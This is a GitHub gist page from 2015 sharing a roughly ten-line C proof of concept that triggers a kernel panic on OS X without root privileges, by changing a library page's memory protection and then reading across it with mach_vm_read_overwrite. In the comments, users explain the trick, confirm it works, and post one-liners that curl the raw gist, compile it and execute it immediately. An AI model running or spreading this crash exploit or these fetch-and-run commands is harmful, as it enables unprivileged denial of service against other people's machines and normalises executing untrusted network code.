Skip to content

Instantly share code, notes, and snippets.

/gist:de6b81c556b5dc7cdc8b

Created February 20, 2015 01:42
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save anonymous/de6b81c556b5dc7cdc8b to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save anonymous/de6b81c556b5dc7cdc8b to your computer and use it in GitHub Desktop.
Download ZIP
Kernel panic in latest OS X in 10 lines of C
Raw
gistfile1.txt
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>
int
main (int argc, char * argv[])
{
volatile char * library;
const mach_vm_size_t page_size = getpagesize ();
const mach_vm_size_t buffer_size = 3 * page_size;
char buffer[buffer_size];
mach_vm_size_t result_size;
library = (char *) _dyld_get_image_header (1);
mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
library[page_size]++;
library[page_size]--;
result_size = 0;
mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);
return 0;
}
@sbose78

sbose78 commented Feb 20, 2015

Copy link
Copy Markdown

Some code comments would help :(

@evilsocket

evilsocket commented Feb 20, 2015

Copy link
Copy Markdown

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writings on that offset and then tries to read the first 3 pages of the image into a buffer.

@oleavr

oleavr commented Feb 20, 2015

Copy link
Copy Markdown

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

@kainz

kainz commented Feb 21, 2015

Copy link
Copy Markdown

Does this require root to run?

@jhorowitz

jhorowitz commented Feb 21, 2015

Copy link
Copy Markdown

@kainz No

@workmanw

workmanw commented Feb 21, 2015

Copy link
Copy Markdown

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash

@Bilge

Bilge commented Feb 21, 2015

Copy link
Copy Markdown 
library[page_size]++;
library[page_size]--;

Am I being trolled?

@bcho

bcho commented Feb 21, 2015

Copy link
Copy Markdown

@Bilge No, these two lines are used to make the library dirty. See @oleavr 's comment.

@CoolOppo

CoolOppo commented Feb 21, 2015

Copy link
Copy Markdown 
panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

@skull-squadron

skull-squadron commented Feb 23, 2015

Copy link
Copy Markdown

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out

@iskl

iskl commented Apr 5, 2015

Copy link
Copy Markdown

The code do works!!! Awesome!!! Fantastic!!! Unreal!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment